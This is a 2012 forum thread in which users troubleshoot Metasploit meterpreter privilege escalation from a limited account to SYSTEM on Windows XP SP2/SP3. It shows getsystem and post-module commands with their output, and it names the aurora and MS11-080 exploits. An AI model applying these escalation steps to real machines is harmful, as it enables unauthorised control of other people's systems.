bobbyb1980 Posted February 29, 2012

Greetings fellow hackers. I am trying to figure out a way to open a meterpreter shell on a victim machine that is running a Windows XP limited user account. Getsystem and use priv only seem to be working for escalation from Admin to system, but I am trying to go from limited user to admin. I was using the uacbypass module for Windows 7 limited user accounts, but can't find anything similar for XP. Any ideas?
bobbyb1980 Posted February 29, 2012 (Author)

The target is SP2.
bobbyb1980 Posted February 29, 2012 (Author)

To my knowledge getsystem will only get you system level privs if you already have Admin privs; it's not working to escalate a limited user account to Admin/Sys.
hexophrenic Posted February 29, 2012

> To my knowledge getsystem will only get you system level privs if you already have Admin privs; it's not working to escalate a limited user account to Admin/Sys.

You are mostly right in that getsystem will typically get you system level privs, but then you can use incognito or migrate processes to obtain other user rights. However, on XP SP2 getsystem should work from any meterpreter session, at least it always has for me. I wish I could help more, but it sounds like a module is not working quite right for you. Are you running in trunk? Did you do an msfupdate?
bobbyb1980 Posted March 1, 2012 (Author)

Hey guys. Looks like only SP2 is vulnerable to this module. I tried several different modules and none of them work in SP3. Does anyone know a way to elevate a limited user account to either Admin/SYS in SP3?

meterpreter > getuid
Server username: testinglimited\limited
meterpreter >
meterpreter > run post/windows/escalate/getsystem
[-] Post failed: Rex::Post::Meterpreter::RequestError priv_elevate_getsystem: Operation failed: Access is denied.
[-] Call stack:
[-] /opt/framework-4.0.0/msf3/lib/rex/post/meterpreter/extensions/priv/priv.rb:68:in `getsystem'
[-] /opt/framework-4.0.0/msf3/modules/post/windows/escalate/getsystem.rb:59:in `run'
meterpreter > run post/windows/escalate/ms10_092_schelevator
[-] Windows XP (Build 2600, Service Pack 3). is not vulnerable.
bobbyb1980 Posted March 1, 2012 (Author)

I found this Python script that will respawn a system/admin shell from an XP SP3 limited user account. I already have a meterpreter shell on the box. Goal is to get from limited user to admin/sys.

http://www.exploit-db.com/exploits/18176/

The problem is that I can't upload files via a meterpreter limited access shell.

meterpreter > upload /tmp/ms11_080.py C:\\
[*] uploading : /tmp/ms11_080.py -> C:\
[-] core_channel_open: Operation failed: Access is denied.

Any ideas?
hexophrenic Posted March 1, 2012

Why not just "use privs" then "getsystem" at the prompt? What happens then?
bobbyb1980 Posted March 1, 2012 (Author)

I've already posted the output. Doesn't work in SP3.
hexophrenic Posted March 1, 2012

Don't know what else to tell you. I just fired up XP SP3 (I also know these work in SP2), ran the aurora exploit against it (ms10_002_aurora):

meterpreter > getuid
Server username: computer\user
meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Then I tried your method, using the module getsystem.rb explicitly, and same thing more or less.

meterpreter > getuid
Server username: computer\user
meterpreter > run post/windows/escalate/getsystem
[+] Obtained SYSTEM via technique 4
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Which exploit are you using? Which payload?